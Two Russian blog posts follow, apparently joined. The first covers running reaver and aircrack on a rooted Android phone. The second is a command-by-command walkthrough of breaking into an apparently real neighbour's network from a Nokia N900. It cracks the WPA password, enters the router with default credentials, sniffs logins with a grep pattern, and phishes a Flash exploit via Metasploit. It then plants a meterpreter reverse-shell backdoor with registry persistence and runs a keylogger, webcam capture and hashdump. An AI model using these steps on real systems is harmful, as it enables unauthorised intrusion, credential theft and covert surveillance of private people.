Когда нечего делать или как я устанавливал aircrack и reaver на android.
Я подумал а не попробовать ли мне установить kali-linux на android через linux installer, но затем передумал и решил просто установить reaver и aircrack на телефон. Но тут возник вопрос как перевести WiFi в режим монитора.
В интернете про запуск reaver'a и aircrack'a под android'om информации мало, в основном на
XDA-Developers. Исходя из того что я вычитал из XDA для того чтобы как перевести WiFi в режим монитора нужно компилировать/ставить на телефон кастомные драйвера для WiFi, которые, к тому же, не факт что будут работать… Ну в общем ничего хорошего я там не вычитал, разве что нашел reaver скомпилированный под android. А вот с aircrack'om вышла проблема, его я искал долго и нудно, но нашел статическую версию для armel.
Итак пол дела сделано, осталось разобраться с режимом монитора.
Опять же на XDA была статья про это, но там требовалось ставить кастомные драйвера и по моему ядро. Я подумал что это слишком, подумал может как нибудь получится без этого. Запустил на телефоне эмулятор терминала и начал колупать. В итоге выяснил что и драйвера и адаптер режим монитора поддерживают, но перевести адаптер в этот самый режим оказалось не так просто. Но добрый гугл мне помог разобратсья с этой проблемой.
Итак уже почти все готово. Запускаем
airodump-ng:
О чудо он работает.
Ну впрочем теперь можно и
reaver попробовать запустить:
Неужели и он работает?
Но в каждой бочке мёда есть своя ложка дегтя:
Из выше расположенного скриншота видно что скорость перебора ключей reaver'om 7 секунд на ключ, это конечно прискорбно. Ждать пока он подберет пароль к роутеру было бы неразумно, поэтому я и не стал.
Испытуемым был SE Xperia Mini, но на более новых более мощных телефонах, думаю, процесс пойдет быстрее.
Инструкция:
Вдруг кому то пригодится.
Предупреждение! Автор за последствия ответственность не несет, все что вы делаете вы делаете на свой страх и риск.
Все что я делал, я делал на Android ICS 4.0.4 (будет ли это работать на других — не знаю, но думаю на 4.x.x должно).
Нам понадобится:
- Телефон с Android'om на борту (В данном случае SE Xperia Mini, 512 RAM, 1 GHz, Android ICS 4.0.4);
- Рут права;
- Эмулятор терминала или аналог;
- Reaver и aircrack скомпилированные под android (можно скачать тут или собрать свои);
- Роутер (В данном случае TP-Link на счет модели — не знаю);
- Компьютер с установленным ADB — не обязательно, но удобно;
- И самое главное — прямые руки, без них — никак.
Итак приступим
Тут есть два варианта:
- Скопировать утилиты на SD карту и перемонтировать ее для выполнения;
- Перемонтировать /system для записи и скинуть туда.
Я выбрал второй способ.
Далее нам надо запустить WiFi в режиме монитора (пока будет запущен монитор WiFi будет немного нестабилен).
Для начала нужно создать экземпляр монитора, для этого заходим в терминал и пишем:
su
iw phy0 interface add mon0 type monitor
mon0 можно заменить на любое другое имя
В результате получим что-то вроде этого:
Если набрать
netcfg увидим следующее:
Где wlan0 и mon0 это именно то что нам нужно.
Для работы монитора WiFi должен быть включен в настройках телефона
Осталась самая малость.
Запускаем airodump
netcfg mon0 up
cd /путь/к/бинарникам/airodump
./airodump -i mon0
Для остановки необходимо нажать Ctrl+C (Уменьшить громкость, затем C на англ. раскладке — справедливо для Android Terminal Emulator).
Запускаем reaver
cd /путь/к/бинарникам/reaver
./reaver -i mon0 -b 11:22:33:44:55:66 -vv
11:22:33:44:55:66 как вы поняли нужно заменить на BSSID необходимой сети
Для остановки необходимо нажать Ctrl+C (Уменьшить громкость, затем C на англ. раскладке — справедливо для Android Terminal Emulator).
Послесловие
Перебирает reaver конечно медленно, но возможно на более новых мощных телефонах процесс пойдет быстрее.
А также кроме reaver'a имеются airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, aireplay-ng, airodump-ng, airserv-ng, airtun-ng, besside-ng, besside-ng-crawler, packetforge-ng, wash может кому пригодятся.
А также хочу предупредить что…
- … reaver работает немного нестабильно, порой не хочет подключатся к сети.
- … монитор нужно выключать иначе будут проблемы с подключением к сетям.
su
netcfg mon0 down
- … после перезапуска телефона монитор mon0 будет удален и его придется создавать заново.
UPD: Для тех у кого нет iw, его можно взять тут
Для тех у кого нет ifconfig нужно установить busybox
Для тех, у кого нет iwconfig, его можно найти тут
http://forum.antichat.ru/threads/50472/ доки программ
Доброго времени суток %username%.
В этой статье речь пойдет о взло аудите Wi-Fi сети, снифифнге и безопасности компьютера в целом.Разъяснять по пунктам все функции, опции и теорию взлома я не буду, в гугле сотни статей по тем утилитам, которые я буду использовать в данном материале, тут речь пойдет больше о практике.
Цель-получить рута(ну или админа) на удаленной машине.В качестве инструмента по взлому я выбрал телефон Nokia N900. Под рукой имеются и более мощные машины, скажем так в десятки раз мощнее, но если бы я использовал рядовой х86 компьютер, согласитесь не было бы так интересно.
Немного о самом аппарате: Nokia N900 является продолжением линейки серии Nххх и в отличии от братьев меньших имеет встроенный модуль сотовой связи и естественное логическое продолжение и улучшение линейки. Аппарат работает под платформой Maemo, на ядре дебиана 2.6.28. Что позволило комьюнити маемо портировать на аппарат очень много интересного софта, которым мы собственно и будем пользоваться. Стандартное ядро аппарата было заменено на кастромное сборки «Power46» к которому в ходе проекта Kernel-Power было добавлено
много разных плюшек + установлен небольшой апгрейд, позволяющий использовать активную атаку в сетевых утилитах типа aircrack-ng.Про установку софта писать я не вижу смысла, в принципе ничего сложного, могут возникнуть
вопросы с ядром, а так всё делается через стандартный apt-get.
Итак, для начала нам нужно пробраться в сеть, посмотреть что там к чему и далее “импровизировать”.
Глава 1. Аудит сети.
Заходим в терминал из под рута и делаем следующее:
Загружаем драйвера для адекватной работы инъекций на аппарате:
# cd MyDocs/wl1251-maemo/binary/compat-wireless /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.shМеняем мак адрес аппарата из-за соображения безопасности так сказать:
# macchanger -A wlan0Включаем режим монитора:
#airmon-ng start wlan0
Теперь посмотрим, что есть в сети:
#airodump-ng wlan0
Видим, что в сети есть wifi к которому кто-то уже подключен, попробуем отключить пользователя и перехватить хендшейк. Для этого сначала ставим airodump на запись и скан только по первому каналу и чтобы не ловить лишнего прописываем фильтр по мак адреусу:
#airodump-ng –с 1 –w dlink wlan0 –-bbsid [тут мак адрес]
Открываем новое окно, проверяем как обстоят дела с инъекциями:
#aireplay-ng -9 wlan0
Отличненько! Работает всё, теперь отключаем:
#aireplay-ng -0 3 –a [мак адрес точки] –с [мак адрес подключённого пользователя] wlan0Отправили 3 пакета на отключение на всякий случай и смотрим что получилось:
Итак как видим на скриншоте мы поймали хендшейк, теперь приступим к взлому, перед этим разогнав аппарат побыстрее:
#kernel-config limits 125 1150Скажу сразу, взлом WPA с телефона очень медленный, к сравнению с компьютера взлом средствами процессора даёт примерно до 4-х тысяч паролей в секунду, с CUDA на не очень мощной 295-ой видюхой Nvidia скорость взлома в среднем 60 тысяч паролей в секунду, ну а на телефоне всё, на что способен ARM Cortex-A8 – 125 паролей в секунду с разгоном до 1,15 Ггц. Тем не менее, я решил попробовать, результат меня приятно удивил:
#aircrack-ng –w MyDocs/pass.dic dlink*.cap
Не успел я заварить кофе, как через 4 минуты aircrack-ng нашел пароль «1234567890», это можно назвать везением, т.к. скажем для прошлого перебора мне потребовалось перебрать чуть более 12-ти миллионов ключей по 9-ти различным словарям, прежде чем я нашёл пароль.
Дальше переведя вафлю в стандартный режим я решил подключиться к сети, подключился без проблем, т.к. фильтрации по мак адресу не было, что было крайне предсказуемо учитывая выбор такого пароля. Теперь нужно было понять куда мы подключились и что с этим делать:
Глава 2. В сети
Для сбора информации использовались проги wireshark и чтобы в куче хлама найти заветную инфу- grep. Но снифить WPA сеть достаточно тяжело, в открытом текстовом виде данные не передаются, на свой страх и риск, рассчитывая на то, что пользователь совсем ламер я решил зайти в админку роутера и сменить шифрование, не меняя пароль, конечно это может быть и глупо поскольку даже дурак заподозрит что-то неладное, но я отталкивался от мысли, что роутер называется дефолтно dlink а пароль к нему 1234567890, что заставляло меня усомниться в компьютерных способностях пользователя.
Подключившись к сети, проверил адрес ifconfig-ом, адрес стандартный 192.168.1.101 следовательно админка длинка должна быть 192.168.1.1 и пароль по дефолту пустой, логин админ, смотрим… и да, мои ожидания оправдались, я попал в админку, после чего сменил шифрование, оставив тот-же пароль.
Дальше оставалось только ждать, и спустя некоторое время, вконец измучившись(прошло 2 часа), возможно обзвонив друзей и техподдержку провайдера, о чудо, юзер зашёл в сеть, не сменив её настройки!
Далее открываем wireshark и выставляем в опциях захват пакетов в файл.Отлично, захват пошёл, и беглым взглядом мы видим, что до нас уже тут кто-то побывал, компьютер беспрерывно шлёт NBNS запросы с именами ballscindi.com, gusssiss.com, alazag.com и brutusshawn.com беглым взглядом в гугле мои подозрения
подтвердились, адерса есть в чёрных списках. Немного забегая вперёд скажу, что нашёл в директории Windows интересную папку NEWSPLOIT в которой лежали документы word, exel, power point, и RTF файл, естественно документы «не рабочие» или пустые и в скором времени вызывают подвисание или выключение программы, возможно уязвимость в оффисе и стала причиной попадания данного компьютера в ботнет сеть.
А теперь поищим грепом некоторые полезные сведения, для этого вводим:
#tail -F zahvat | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+|c_user=[0-9]+|sid=[0-9]{1,5}|xs=[0-9a-f]{32}|login=[^&]+|password=[^&]+|admin=[^&]+|cookie=[0-9a-f]+»
И спустя некоторое время видим эмейл и пароль пользователя. Но этого не достаточно, смотрим повнимательней и видим среди трафика строчку User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Да, мои подозрения целиком и полностью подтвердились, через браузер ИЕ6 в ХР-ку пробраться труда не составит, главное найти подходящий сплоит и грамотно его впарить.
Часть 3. Проникаем в компьютер
Итак, чего мы имеем?По пойманным данным мы можем судить о следующем, пользователь сидит в сети с ноутбука фирмы Тошиба, имеет как минимум 1 троян, через который посредством NetBIOS запросов и UDP протокола компьютер функционирует в ботнет сети и в данный момент находится в режиме ожидания, следовательно если даже у владельца и есть антивирус, то уж точно не обновляющийся некоторое время, так-же мы знаем почту и пароль от неё и от десятка ресурсов, порывшись в почте, мы знаем имя владельца и его персональные данные, а так-же имена коллег по работе.
Используя эту информацию мы с лёгкостью сможем скинуть сплоит пользователю, осталось только выбрать какой. Скажу так, испробовал я с десяток сплоитов, но поскольку винда, хоть и ХР – обновления она получает регулярно, поэтому я остановился на сплоите сторонней, но очень популярной программы компании Adobe- Flash player-e, а именно на уязвимостях
CVE-2011-0609 и
CVE-2011-0611, с первой уязвимостью ничего не вышло, зато вторая оказалась работоспособной целиком и полностью, теперь опишу сам процесс в общих чертах.
Для начала решаем чего-же нужно?
А именно получить полный доступ к компьютеру, скинуть бэкдор, чтобы компьютер всегда был в доступе и посмотреть некоторые функции шелла.Обновляем метасплоит:
#ruby1.8 /home/user/msf3/msfupdateЗапускаем метасплоит:
#ruby1.8 /home/user/msf3/msfconsole –LДалее выбираем сплоит:
>use exploit/windows/browser/adobe_flashplayer_flas10oВыбираем нагрзку, будем использовать классический meterpreter:
>set payload windows/meterpreter /reverse_tcpСмотрим через ifconfig свой адрес и вводим настройки локального хоста сплоита:
>set lhost 192.168.1.101После хост сервера :
>set srvhost 192.168.1.101Запускаем:
>exploit
После запуска нам необходимо как-то придать человеческий вид ссылке, поэтому используем ресурс “сокращения” ссылок, я буду пользовать
этот
Теперь ссылку нужно «впарить» Тут вспоминаем чего мы узнали на почте и регистрируем новый аккаунт для отправки письма примерно следующего содержания:
Спустя некоторое время:
Ура! Мы в системе. Далее нужно посмотреть процессы на предмет антивируса, перебраться в другой процесс из блокнота и записать бэкдор, приступим.
Открываем сессию:
> sessions –i 1Запрашиваем инфу о системе, чтобы убедиться что есть коннект:
> sysinfoСмотрим процессы:
>psАнтивирус есть и кстати довольно извесный, раз я подключился, то антивирус либо отключен, либо давно не обновлялся, либо без лицензии, рискнём и мигрируем в explorer:
>migrate [pid]
Получилось! Далее повышаем права до системы:
>getsystem Прогружаем библиатеку для добавления нового пользователя:
>use incognitoИ пытаемся зарегестрировать нового админа:
>add_user [login] [pass]
Итак, пользователя создали, а вот добавить его в группу администраторов, увы не получилось, ну да ладно, включим удалённый рабочий стол:
> run getgui -e (на всякий случай)
И соберём бэкдор:
#ruby1.8 msfpayload windows/meterpreter/reverse_tcp LHOST=[адрес] LPORT=4444 X > /путь к файлу/файл.exe
Теперь загрузим файл и запишем ключ в реестр на автозагрузку:
> reg setval –k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run –v [имя ключа] -d [команда]
Тестируем:
>use exploit/multi/handler
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST [ваш адрес]
Спустя некоторое время после перезагрузки мы снова в системе. Теперь рассмотрим некоторые фишки meterpreter-a.
Скриншот экрана:
>screenshot
Кейлоггер:
>keyscan_start
>keyscan_dump
>keyscan_stop Русский язык не работает, можно переводить всё через сторонние утилиты или через некоторые веб ресурсы, не помню точно где, но видел такую возможность.
Закрываем процесс:
> kill [pid]
Скачиваем файл:
> download [файл] [путь].Собираем хеш:
> hashdump
Получаем доступ к консоли запустив в фоне cmd и войдя в него:
>execute –а cmd.exe –сИ чтобы войти:
>interact [выбираем канал](как видем на скрине, у этого шелла есть явные проблемы с кодировкой)
Делаем снимок с вебкамеры, довольно палевно, учитывая что практически на всех камерах есть световые, а иногда и звуковые индикаторы:
> webcam_snap
Как мы видим качество снимка ужасное и толком ничего не разберёшь, но всё-же это меня поразило когда-то больше всего.
Так-же из интересного – можно записывать с микрофона звуки, но у меня никогда не выходило, писало ровно в секунду длинной, сколько бы время не выставлял времени и прекращалось.
Как и практически во всех консольных утилитах полный список возможностей можно получить коммандой help.Вобщем как мы видим возможности безграничны практически, к возможностям самого шелла добавляется консоль виндовса, большего в принципе и ненужно, и в конце всего можно написать только одно – OWNED:)
Глава 4. Заключение
В этой небольшой статье-обзоре я показал некоторые возможности планшета n900,и крайне популярных программ. Эта статья не претендует на уникальность взлома и врятли покажет чего-то новое тому, кто уже вник в процесс аудита безопасности, тут скорее уникальность заключается в том, что всё это было проделано с сотового телефона, ну и я показал работу «горячей» уязвимости 2-х недельной давности.
Извиняюсь если где-то есть ошибки или неточности, время 5 часов утра и уже сильно клонит в сон.
Ну а что касательно самого “аудита” этот случай, скорей исключение, чем правило. С такой лёгкостью можно взломать лишь человека, который вобще далёкого от компьютера, естественно пользы от такого совсем мало, порою уязвимость можно искать неделями, а перебор пароля к роутеру вести по 2 дня без перерыва, собственно меня и сподвигло к написанию этой статьи такая возможность, описать на одном наглядном примере сразу несколько утилит, работающих вместе для достижения конкретной цели, так еще и с явно нестандартного для этих целей устройства.
Надеюсь статья кому-нибудь будет поезна, особенно начинающим в этом деле, ведь всё описанное тут спокойно можно 1 в 1 выполнять на компьютере в той-же последовательности.
P.S. Для ленивых:
Всё описанное тут можно спокойно проверить самостоятельно, установив винду XP на виртуальную машину(или куда либо еще) и скачав флеш плеер версии 10.2.153.1
тут(ссылка на пиратскую бухту, извиняюсь, но не нашёл другого ресурса где спокойно 24/7 без ожидания и кодов и на нормальной скорости можно скачать «старую» версию флешплеера),Ознакомиться с исходным кодом эксплоита можно
здесть,Весь софт можно найти
тут в одном немало известном дистрибьютиве.
Похожие посты
